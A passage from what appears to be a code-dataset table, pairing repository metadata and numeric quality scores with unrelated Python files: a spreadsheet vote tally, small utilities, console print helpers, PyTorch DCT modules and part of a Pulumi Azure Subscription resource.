| false
| 0.019231
| 0.012821
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0f592824ee2c266c1ac968dcc2a2186f6007519f
| 4,109
|
py
|
Python
|
Followers.py
|
jemmypotter/Python
|
c8fc5c49c5289dc0598c93eef4cfbcb5701c2b32
|
[
"bzip2-1.0.6"
] | null | null | null |
Followers.py
|
jemmypotter/Python
|
c8fc5c49c5289dc0598c93eef4cfbcb5701c2b32
|
[
"bzip2-1.0.6"
] | null | null | null |
Followers.py
|
jemmypotter/Python
|
c8fc5c49c5289dc0598c93eef4cfbcb5701c2b32
|
[
"bzip2-1.0.6"
] | null | null | null |
import xlrd
from tkinter.filedialog import askopenfilename
def path():
p=askopenfilename()
return p
def part():
p=path()
workbook=xlrd.open_workbook(p)
worksheet=workbook.sheet_by_index(0)
parts=[]
for i in range(9, 21):
party = worksheet.cell_value(10, i)
parts.append(party)
return parts
def dists():
path1=path()
wb=xlrd.open_workbook(path1)
ws=wb.sheet_by_index(0)
di=[]
for i in range(11, 50):
district = ws.cell_value(i, 2)
di.append(district)
return di
print(dists())
def check():
path1=path()
parties=part()
districts=dists()
whole={}
workbook=xlrd.open_workbook(path1)
worksheet=workbook.sheet_by_index(0)
vote1 = []
vote2 = []
vote3 = []
vote4 = []
vote5 = []
vote6 = []
vote7 = []
vote8 = []
vote9 = []
vote10 = []
vote11 = []
vote12 = []
for i in range(11,50):
vote_saadet=worksheet.cell_value(i,9)
vote_btp=worksheet.cell_value(i,10)
vote_tkp=worksheet.cell_value(i,11)
vote_vatan=worksheet.cell_value(i,12)
vote_bbp=worksheet.cell_value(i,13)
vote_chp=worksheet.cell_value(i,14)
vote_ak=worksheet.cell_value(i,15)
vote_dp=worksheet.cell_value(i,16)
vote_mhp=worksheet.cell_value(i,17)
vote_iyi=worksheet.cell_value(i,18)
vote_hdp=worksheet.cell_value(i,19)
vote_dsp=worksheet.cell_value(i,20)
vote1.append(vote_saadet)
vote2.append(vote_btp)
vote3.append(vote_tkp)
vote4.append(vote_vatan)
vote5.append(vote_bbp)
vote6.append(vote_chp)
vote7.append(vote_ak)
vote8.append(vote_dp)
vote9.append(vote_mhp)
vote10.append(vote_iyi)
vote11.append(vote_hdp)
vote12.append(vote_dsp)
whole[parties[0]] = vote1
whole[parties[1]] = vote2
whole[parties[2]] = vote3
whole[parties[3]] = vote4
whole[parties[4]] = vote5
whole[parties[5]] = vote6
whole[parties[6]] = vote7
whole[parties[7]] = vote8
whole[parties[8]] = vote9
whole[parties[9]] = vote10
whole[parties[10]] = vote11
whole[parties[11]] = vote12
return whole
#print(check())
def check2():
path1=path()
parties=part()
districts=dists()
workbook=xlrd.open_workbook(path1)
worksheet=workbook.sheet_by_index(0)
whole={}
vote1 = []
vote2 = []
vote3 = []
vote4 = []
vote5 = []
vote6 = []
vote7 = []
vote8 = []
vote9 = []
vote10 = []
vote11 = []
vote12 = []
for i in range(11,50):
vote_saadet=worksheet.cell_value(i,9)
vote_btp=worksheet.cell_value(i,10)
vote_tkp=worksheet.cell_value(i,11)
vote_vatan=worksheet.cell_value(i,12)
vote_bbp=worksheet.cell_value(i,13)
vote_chp=worksheet.cell_value(i,14)
vote_ak=worksheet.cell_value(i,15)
vote_dp=worksheet.cell_value(i,16)
vote_mhp=worksheet.cell_value(i,17)
vote_iyi=worksheet.cell_value(i,18)
vote_hdp=worksheet.cell_value(i,19)
vote_dsp=worksheet.cell_value(i,20)
vote1.append(vote_saadet)
vote2.append(vote_btp)
vote3.append(vote_tkp)
vote4.append(vote_vatan)
vote5.append(vote_bbp)
vote6.append(vote_chp)
vote7.append(vote_ak)
vote8.append(vote_dp)
vote9.append(vote_mhp)
vote10.append(vote_iyi)
vote11.append(vote_hdp)
vote12.append(vote_dsp)
vote=[vote1,vote2,vote3,vote4,vote5,vote6,vote7,vote8,vote9,vote10,vote11,vote12]
whole[parties[0]] = vote1
whole[parties[1]] = vote2
whole[parties[2]] = vote3
whole[parties[3]] = vote4
whole[parties[4]] = vote5
whole[parties[5]] = vote6
whole[parties[6]] = vote7
whole[parties[7]] = vote8
whole[parties[8]] = vote9
whole[parties[9]] = vote10
whole[parties[10]] = vote11
whole[parties[11]] = vote12
for k in parties:
for val in range(0,39):
whole[k][val]=districts[val]
print(whole)
check2()
| 27.032895
| 85
| 0.613531
| 552
| 4,109
| 4.411232
| 0.161232
| 0.096099
| 0.184805
| 0.187269
| 0.826283
| 0.826283
| 0.779877
| 0.779877
| 0.779877
| 0.779877
| 0
| 0.069213
| 0.254563
| 4,109
| 151
| 86
| 27.211921
| 0.725759
| 0.003407
| 0
| 0.79021
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034965
| false
| 0
| 0.013986
| 0
| 0.076923
| 0.013986
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
0f5cea0a294e94e966938fe384841a587b229494
| 137
|
py
|
Python
|
addons/test_mail/models/__init__.py
|
SHIVJITH/Odoo_Machine_Test
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
[
"Apache-2.0"
] | null | null | null |
addons/test_mail/models/__init__.py
|
SHIVJITH/Odoo_Machine_Test
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
[
"Apache-2.0"
] | null | null | null |
addons/test_mail/models/__init__.py
|
SHIVJITH/Odoo_Machine_Test
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from . import test_mail_models
from . import test_mail_corner_case_models
from . import test_mail_thread_models
| 22.833333
| 42
| 0.781022
| 21
| 137
| 4.666667
| 0.52381
| 0.306122
| 0.428571
| 0.55102
| 0.489796
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008403
| 0.131387
| 137
| 5
| 43
| 27.4
| 0.815126
| 0.153285
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0f80b5877d002f067a34c87c2dba7b3dbd01e52b
| 711
|
py
|
Python
|
xutilities/numeric.py
|
stbraun/xutilities
|
c5c83a3dea406a5d24c07c16cbe9039302445d3b
|
[
"MIT"
] | null | null | null |
xutilities/numeric.py
|
stbraun/xutilities
|
c5c83a3dea406a5d24c07c16cbe9039302445d3b
|
[
"MIT"
] | null | null | null |
xutilities/numeric.py
|
stbraun/xutilities
|
c5c83a3dea406a5d24c07c16cbe9039302445d3b
|
[
"MIT"
] | null | null | null |
# coding=utf-8
"""
Some utilities related to numbers.
"""
def is_even(num: int) -> bool:
"""Is num even?
:param num: number to check.
:type num: int
:returns: True if num is even.
:rtype: bool
:raises: ``TypeError`` if num is not an int.
"""
if not isinstance(num, int):
raise TypeError("{} is not an int".format(num))
return num % 2 == 0
def is_odd(num: int) -> bool:
"""Is num odd?
:param num: number to check.
:type num: int
:returns: True if num is odd.
:rtype: bool
:raises: ``TypeError`` if num is not an int.
"""
if not isinstance(num, int):
raise TypeError("{} is not an int".format(num))
return num % 2 == 1
| 21.545455
| 55
| 0.57384
| 108
| 711
| 3.759259
| 0.314815
| 0.08867
| 0.068966
| 0.098522
| 0.82266
| 0.748768
| 0.748768
| 0.748768
| 0.748768
| 0.748768
| 0
| 0.009804
| 0.2827
| 711
| 32
| 56
| 22.21875
| 0.786275
| 0.4782
| 0
| 0.5
| 0
| 0
| 0.105611
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7e501f15c970b26484e13d22856614a97e027c0a
| 1,543
|
py
|
Python
|
spotifix/print_func.py
|
FlorianLeveil/UF_DEV_LOGICIEL
|
c48fd1ec5a7c89f03fbe1679b4306fdda3ddf46e
|
[
"MIT"
] | null | null | null |
spotifix/print_func.py
|
FlorianLeveil/UF_DEV_LOGICIEL
|
c48fd1ec5a7c89f03fbe1679b4306fdda3ddf46e
|
[
"MIT"
] | null | null | null |
spotifix/print_func.py
|
FlorianLeveil/UF_DEV_LOGICIEL
|
c48fd1ec5a7c89f03fbe1679b4306fdda3ddf46e
|
[
"MIT"
] | null | null | null |
ENDC = '\033[0m'
OKGREEN = '\033[92m'
def print_play_my_playlist(playlist_name, name_song, artist, total_time, prefix, bar, percent, suffix):
print("\033[F"*13)
print(
f'{playlist_name} | {name_song} | {artist} | {total_time[:7]}',
f'{prefix}|{OKGREEN}{bar}{ENDC}|{percent[:7]} {suffix}',
f'',
f'p : Pause',
f'l : Play',
f'+ / - : Volume',
f's : Shuffle',
f'n : Next Song',
f'b : Previous Song',
f'x : exit',
f'',
f'',
sep="\n"
)
def print_play_one_song(name_song, artist, total_time, prefix, bar, percent, suffix):
print("\033[F"*13)
print(
f'{name_song} | {artist} | {total_time[:7]}',
f'{prefix}|{OKGREEN}{bar}{ENDC}|{percent[:7]} {suffix}',
f'',
f'p : Pause',
f'l : Play',
f'+ : Up Volume',
f'- : Down Volume',
f'r : Add to a playlist',
f'x : exit',
f'',
f'',
f'',
sep="\n"
)
def print_play_playlist(playlist_name, name_song, artist, total_time, prefix, bar, percent, suffix):
print("\033[F"*13)
print(
f'{playlist_name} | {name_song} | {artist} | {total_time[:7]}',
f'{prefix}|{OKGREEN}{bar}{ENDC}|{percent[:7]} {suffix}',
f'',
f'p : Pause',
f'l : Play',
f'+ / - : Volume',
f's : Shuffle',
f'n : Next Song',
f'b : Previous Song',
f'a : Follow this playlist',
f'x : exit',
f'',
sep="\n"
)
| 27.553571
| 103
| 0.474401
| 200
| 1,543
| 3.54
| 0.22
| 0.067797
| 0.118644
| 0.161017
| 0.879944
| 0.830508
| 0.830508
| 0.779661
| 0.779661
| 0.779661
| 0
| 0.02893
| 0.327933
| 1,543
| 56
| 104
| 27.553571
| 0.653809
| 0
| 0
| 0.754717
| 0
| 0
| 0.396373
| 0.083549
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056604
| false
| 0
| 0
| 0
| 0.056604
| 0.169811
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7e813e68c2c720702287979e433631f480d9f6f5
| 475
|
py
|
Python
|
utils/emuns.py
|
venthent/MusicDownloader
|
76052513ccdc4b6ebb0fc0d2d05a39debc76263d
|
[
"Apache-2.0"
] | null | null | null |
utils/emuns.py
|
venthent/MusicDownloader
|
76052513ccdc4b6ebb0fc0d2d05a39debc76263d
|
[
"Apache-2.0"
] | null | null | null |
utils/emuns.py
|
venthent/MusicDownloader
|
76052513ccdc4b6ebb0fc0d2d05a39debc76263d
|
[
"Apache-2.0"
] | null | null | null |
PARAMS = 'Ef9lNdClTjkbPliRqRyzMvS5YAwFt6Qcelx8fba8CkPPaQaO7sodt2Ei9M58RJZDd/o/pX94EYfdR40Wtg1JMgpV5hcsUQthNtpneuM2oCQVc/G7moHQRUzT4oobALKlAJ5/Kw1BH30vvNRRUgTY4i2w0VI5MkJyNWDK4c80CDR1/L9soSmDkfn/lmhId3fx',
ENCSecKey="38ea911cdb0a1effa4c6ea420475ad8908913b9b207ec3d30cc98302d9c44605b327a79b75996939321dc2d02edf48f324c1045c7c7f10fd6956c417d273ab84bb5ddf57efdef1d4e9c3e91c97ea7abff75578e7cf25e1a9f3f03fcde61d1e4db326887d03c5749a3db843b6b06a9da539f32cfe4d27d7e86486d31a69daf52b"
| 118.75
| 268
| 0.962105
| 10
| 475
| 45.7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.395745
| 0.010526
| 475
| 3
| 269
| 158.333333
| 0.576596
| 0
| 0
| 0
| 0
| 0
| 0.945148
| 0.945148
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7e96408f30552bef242a2f0e7a1b2a0f9ebf4bd8
| 7,196
|
py
|
Python
|
GPBlend/dct_module.py
|
GuardSkill/ImageBlend
|
2c5f5b50882d438557fd380173ed74cb52832b92
|
[
"Apache-2.0"
] | null | null | null |
GPBlend/dct_module.py
|
GuardSkill/ImageBlend
|
2c5f5b50882d438557fd380173ed74cb52832b92
|
[
"Apache-2.0"
] | null | null | null |
GPBlend/dct_module.py
|
GuardSkill/ImageBlend
|
2c5f5b50882d438557fd380173ed74cb52832b92
|
[
"Apache-2.0"
] | null | null | null |
import time
import torch
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
import numbers
import numpy as np
class dctmodule(nn.Module):
def __init__(self, shape):
super(dctmodule, self).__init__()
N = shape[-1]
k = torch.nn.Parameter(- torch.arange(N, dtype=float)[None, :] * np.pi / (2 * N))
self.W_r = torch.cos(k)
self.W_i = torch.sin(k)
def forward(self, x, norm=None):
x_shape = x.shape
N = x_shape[-1]
x = x.contiguous().view(-1, N)
v = torch.cat([x[:, ::2], x[:, 1::2].flip([1])], dim=1)
# Vc = torch.rfft(v, 1, onesided=False) #
Vc = torch.view_as_real(torch.fft.fft(v, dim=1)) # pytoch 1.9
V = Vc[:, :, 0] * self.W_r - Vc[:, :, 1] * self.W_i
if norm == 'ortho':
V[:, 0] /= np.sqrt(N) * 2
V[:, 1:] /= np.sqrt(N / 2) * 2
V = 2 * V.view(*x_shape)
return V
class dctmodule2D(nn.Module):
def __init__(self, shape):
super(dctmodule2D, self).__init__()
N_weight = shape[-1]
k_weight = - torch.arange(N_weight, dtype=float)[None, :] * np.pi / (2 * N_weight)
self.W_r_weight = torch.nn.Parameter(torch.cos(k_weight))
self.W_i_weight = torch.nn.Parameter(torch.sin(k_weight))
self.inverted_index_weight = torch.arange(N_weight - 1, 0, -2)
self.index_weight = torch.arange(0, N_weight, 2)
N_height = shape[-2]
k_height = - torch.arange(N_height, dtype=float)[None, :] * np.pi / (2 * N_height)
self.W_r_height = torch.nn.Parameter(torch.cos(k_height))
self.W_i_height = torch.nn.Parameter(torch.sin(k_height))
self.inverted_index_height = torch.arange(N_height - 1, 0, -2)
self.index_height = torch.arange(0, N_height, 2)
self.N_weight = N_weight
self.N_height = N_height
def _apply(self, fn):
super(dctmodule2D, self)._apply(fn)
self.inverted_index_weight = fn(self.inverted_index_weight)
self.inverted_index_height = fn(self.inverted_index_height)
self.W_r_weight = fn(self.W_r_weight)
self.W_i_weight = fn(self.W_i_weight)
self.W_r_height = fn(self.W_r_height)
self.W_i_height = fn(self.W_i_height)
return self
def forward(self, x, norm='ortho'):
x_shape = x.shape
N = self.N_weight
x = x.contiguous().view(-1, N)
# v = torch.cat([x[:, ::2], x[:, 1::2].flip([1])], dim=1)
v = torch.cat([x[:, self.index_weight], x[:, self.inverted_index_weight]], dim=1)
# Vc = torch.rfft(v, 1, onesided=False) #
Vc = torch.view_as_real(torch.fft.fft(v.float(), dim=1)) # pytoch 1.9
# Vc = torch.view_as_real(torch.fft.fft(v, dim=1))
V = Vc[:, :, 0] * self.W_r_weight - Vc[:, :, 1] * self.W_i_weight
if norm == 'ortho':
V[:, 0] /= np.sqrt(N) * 2
V[:, 1:] /= np.sqrt(N / 2) * 2
V = 2 * V.view(*x_shape)
x = V.transpose(-1, -2)
x_shape = x.shape
N = self.N_height
x = x.contiguous().view(-1, N)
# v = torch.cat([x[:, ::2], x[:, 1::2].flip([1])], dim=1)
v = torch.cat([x[:, self.index_height], x[:, self.inverted_index_height]], dim=1)
# Vc = torch.rfft(v, 1, onesided=False)
# torch.cuda.synchronize()
# TEST_TIME = time.time()
Vc = torch.view_as_real(torch.fft.fft(v, dim=1)) # pytoch 1.9 第二次fft最耗时
# Vc = torch.view_as_real(torch.fft.fft(v, dim=1))
# Vc = Vc
# torch.cuda.synchronize()
# print('TEST TIME', (time.time() - TEST_TIME) * 1000)
V = Vc[:, :, 0] * self.W_r_height - Vc[:, :, 1] * self.W_i_height
if norm == 'ortho':
V[:, 0] /= np.sqrt(N) * 2
V[:, 1:] /= np.sqrt(N / 2) * 2
V = 2 * V.view(*x_shape)
V = V.transpose(-1, -2)
return V
class idctmodule2D(nn.Module):
def __init__(self, shape):
super(idctmodule2D, self).__init__()
N_weight = shape[-1]
k_weight = torch.arange(N_weight, dtype=float)[None, :] * np.pi / (2 * N_weight)
self.W_r_weight = torch.nn.Parameter(torch.cos(k_weight))
self.W_i_weight = torch.nn.Parameter(torch.sin(k_weight))
self.inverted_index_weight = torch.arange(N_weight - 1, 0, -2)
self.index_weight = torch.arange(0, N_weight, 2)
N_height = shape[-2]
k_height = torch.arange(N_height, dtype=float)[None, :] * np.pi / (2 * N_height)
self.W_r_height = torch.nn.Parameter(torch.cos(k_height))
self.W_i_height = torch.nn.Parameter(torch.sin(k_height))
self.inverted_index_height = torch.arange(N_height - 1, 0, -2)
self.index_height = torch.arange(0, N_height, 2)
self.N_weight = N_weight
self.N_height = N_height
def _apply(self, fn):
super(idctmodule2D, self)._apply(fn)
self.inverted_index_weight = fn(self.inverted_index_weight)
self.inverted_index_height = fn(self.inverted_index_height)
self.W_r_weight = fn(self.W_r_weight)
self.W_i_weight = fn(self.W_i_weight)
self.W_r_height = fn(self.W_r_height)
self.W_i_height = fn(self.W_i_height)
return self
def forward(self, X, norm='ortho'):
x_shape = X.shape
N = self.N_weight
X_v = X.contiguous().view(-1, x_shape[-1]) / 2
if norm == 'ortho':
X_v[:, 0] *= np.sqrt(N) * 2
X_v[:, 1:] *= np.sqrt(N / 2) * 2
V_t_r = X_v
V_t_i = torch.cat([X_v[:, :1] * 0, -X_v.flip([1])[:, :-1]], dim=1)
V_r = V_t_r * self.W_r_weight - V_t_i * self.W_i_weight
V_i = V_t_r * self.W_i_weight + V_t_i * self.W_r_weight
V = torch.cat([V_r.unsqueeze(2), V_i.unsqueeze(2)], dim=2)
# v = torch.irfft(V, 1, onesided=False)
v = torch.fft.irfft(torch.view_as_complex(V), n=V.shape[1], dim=1) # torch 1.9
# v = torch.fft.irfft(torch.view_as_complex(V.float()), n=V.shape[1], dim=1).half() # torch 1.9
x = v.new_zeros(v.shape)
x[:, ::2] += v[:, :N - (N // 2)]
x[:, 1::2] += v.flip([1])[:, :N // 2]
x = x.view(*x_shape)
X = x.transpose(-1, -2)
x_shape = X.shape
N = self.N_height
X_v = X.contiguous().view(-1, x_shape[-1]) / 2
if norm == 'ortho':
X_v[:, 0] *= np.sqrt(N) * 2
X_v[:, 1:] *= np.sqrt(N / 2) * 2
V_t_r = X_v
V_t_i = torch.cat([X_v[:, :1] * 0, -X_v.flip([1])[:, :-1]], dim=1)
V_r = V_t_r * self.W_r_height - V_t_i * self.W_i_height
V_i = V_t_r * self.W_i_height + V_t_i * self.W_r_height
V = torch.cat([V_r.unsqueeze(2), V_i.unsqueeze(2)], dim=2)
# v = torch.irfft(V, 1, onesided=
v = torch.fft.irfft(torch.view_as_complex(V), n=V.shape[1], dim=1)
# v = torch.fft.irfft(torch.view_as_complex(V.float()), n=V.shape[1], dim=1).half() # torch 1.9
x = v.new_zeros(v.shape)
x[:, ::2] += v[:, :N - (N // 2)]
x[:, 1::2] += v.flip([1])[:, :N // 2]
x = x.view(*x_shape)
return x.transpose(-1, -2)
| 35.800995
| 104
| 0.550306
| 1,178
| 7,196
| 3.140068
| 0.066214
| 0.054069
| 0.032441
| 0.021627
| 0.85077
| 0.825088
| 0.800757
| 0.77183
| 0.765883
| 0.757772
| 0
| 0.032035
| 0.27557
| 7,196
| 200
| 105
| 35.98
| 0.677537
| 0.111034
| 0
| 0.702899
| 0
| 0
| 0.005493
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057971
| false
| 0
| 0.057971
| 0
| 0.173913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e5319be9f03e79c1c36f0d06449324335ec6baa
| 27,772
|
py
|
Python
|
sdk/python/pulumi_azure/core/subscription.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/core/subscription.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/core/subscription.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['SubscriptionArgs', 'Subscription']
@pulumi.input_type
class SubscriptionArgs:
def __init__(__self__, *,
subscription_name: pulumi.Input[str],
alias: Optional[pulumi.Input[str]] = None,
billing_scope_id: Optional[pulumi.Input[str]] = None,
subscription_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workload: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Subscription resource.
:param pulumi.Input[str] subscription_name: The Name of the Subscription. This is the Display Name in the portal.
:param pulumi.Input[str] alias: The Alias name for the subscription. This provider will generate a new GUID if this is not supplied. Changing this forces a new Subscription to be created.
:param pulumi.Input[str] billing_scope_id: The Azure Billing Scope ID. Can be a Microsoft Customer Account Billing Scope ID, a Microsoft Partner Account Billing Scope ID or an Enrollment Billing Scope ID.
:param pulumi.Input[str] subscription_id: The ID of the Subscription. Changing this forces a new Subscription to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Subscription.
:param pulumi.Input[str] workload: The workload type of the Subscription. Possible values are `Production` (default) and `DevTest`. Changing this forces a new Subscription to be created.
"""
pulumi.set(__self__, "subscription_name", subscription_name)
if alias is not None:
pulumi.set(__self__, "alias", alias)
if billing_scope_id is not None:
pulumi.set(__self__, "billing_scope_id", billing_scope_id)
if subscription_id is not None:
pulumi.set(__self__, "subscription_id", subscription_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if workload is not None:
pulumi.set(__self__, "workload", workload)
@property
@pulumi.getter(name="subscriptionName")
def subscription_name(self) -> pulumi.Input[str]:
"""
The Name of the Subscription. This is the Display Name in the portal.
"""
return pulumi.get(self, "subscription_name")
@subscription_name.setter
def subscription_name(self, value: pulumi.Input[str]):
pulumi.set(self, "subscription_name", value)
@property
@pulumi.getter
def alias(self) -> Optional[pulumi.Input[str]]:
"""
The Alias name for the subscription. This provider will generate a new GUID if this is not supplied. Changing this forces a new Subscription to be created.
"""
return pulumi.get(self, "alias")
@alias.setter
def alias(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "alias", value)
@property
@pulumi.getter(name="billingScopeId")
def billing_scope_id(self) -> Optional[pulumi.Input[str]]:
"""
The Azure Billing Scope ID. Can be a Microsoft Customer Account Billing Scope ID, a Microsoft Partner Account Billing Scope ID or an Enrollment Billing Scope ID.
"""
return pulumi.get(self, "billing_scope_id")
@billing_scope_id.setter
def billing_scope_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "billing_scope_id", value)
@property
@pulumi.getter(name="subscriptionId")
def subscription_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subscription. Changing this forces a new Subscription to be created.
"""
return pulumi.get(self, "subscription_id")
@subscription_id.setter
def subscription_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subscription_id", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the Subscription.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def workload(self) -> Optional[pulumi.Input[str]]:
"""
The workload type of the Subscription. Possible values are `Production` (default) and `DevTest`. Changing this forces a new Subscription to be created.
"""
return pulumi.get(self, "workload")
@workload.setter
def workload(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "workload", value)
@pulumi.input_type
class _SubscriptionState:
def __init__(__self__, *,
alias: Optional[pulumi.Input[str]] = None,
billing_scope_id: Optional[pulumi.Input[str]] = None,
subscription_id: Optional[pulumi.Input[str]] = None,
subscription_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
workload: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Subscription resources.
:param pulumi.Input[str] alias: The Alias name for the subscription. This provider will generate a new GUID if this is not supplied. Changing this forces a new Subscription to be created.
:param pulumi.Input[str] billing_scope_id: The Azure Billing Scope ID. Can be a Microsoft Customer Account Billing Scope ID, a Microsoft Partner Account Billing Scope ID or an Enrollment Billing Scope ID.
:param pulumi.Input[str] subscription_id: The ID of the Subscription. Changing this forces a new Subscription to be created.
:param pulumi.Input[str] subscription_name: The Name of the Subscription. This is the Display Name in the portal.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Subscription.
:param pulumi.Input[str] tenant_id: The ID of the Tenant to which the subscription belongs.
:param pulumi.Input[str] workload: The workload type of the Subscription. Possible values are `Production` (default) and `DevTest`. Changing this forces a new Subscription to be created.
"""
if alias is not None:
pulumi.set(__self__, "alias", alias)
if billing_scope_id is not None:
pulumi.set(__self__, "billing_scope_id", billing_scope_id)
if subscription_id is not None:
pulumi.set(__self__, "subscription_id", subscription_id)
if subscription_name is not None:
pulumi.set(__self__, "subscription_name", subscription_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
if workload is not None:
pulumi.set(__self__, "workload", workload)
@property
@pulumi.getter
def alias(self) -> Optional[pulumi.Input[str]]:
"""
The Alias name for the subscription. This provider will generate a new GUID if this is not supplied. Changing this forces a new Subscription to be created.
"""
return pulumi.get(self, "alias")
@alias.setter
def alias(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "alias", value)
@property
@pulumi.getter(name="billingScopeId")
def billing_scope_id(self) -> Optional[pulumi.Input[str]]:
"""
The Azure Billing Scope ID. Can be a Microsoft Customer Account Billing Scope ID, a Microsoft Partner Account Billing Scope ID or an Enrollment Billing Scope ID.
"""
return pulumi.get(self, "billing_scope_id")
@billing_scope_id.setter
def billing_scope_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "billing_scope_id", value)
@property
@pulumi.getter(name="subscriptionId")
def subscription_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subscription. Changing this forces a new Subscription to be created.
"""
return pulumi.get(self, "subscription_id")
@subscription_id.setter
def subscription_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subscription_id", value)
@property
@pulumi.getter(name="subscriptionName")
def subscription_name(self) -> Optional[pulumi.Input[str]]:
"""
The Name of the Subscription. This is the Display Name in the portal.
"""
return pulumi.get(self, "subscription_name")
@subscription_name.setter
def subscription_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subscription_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the Subscription.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tenantId")
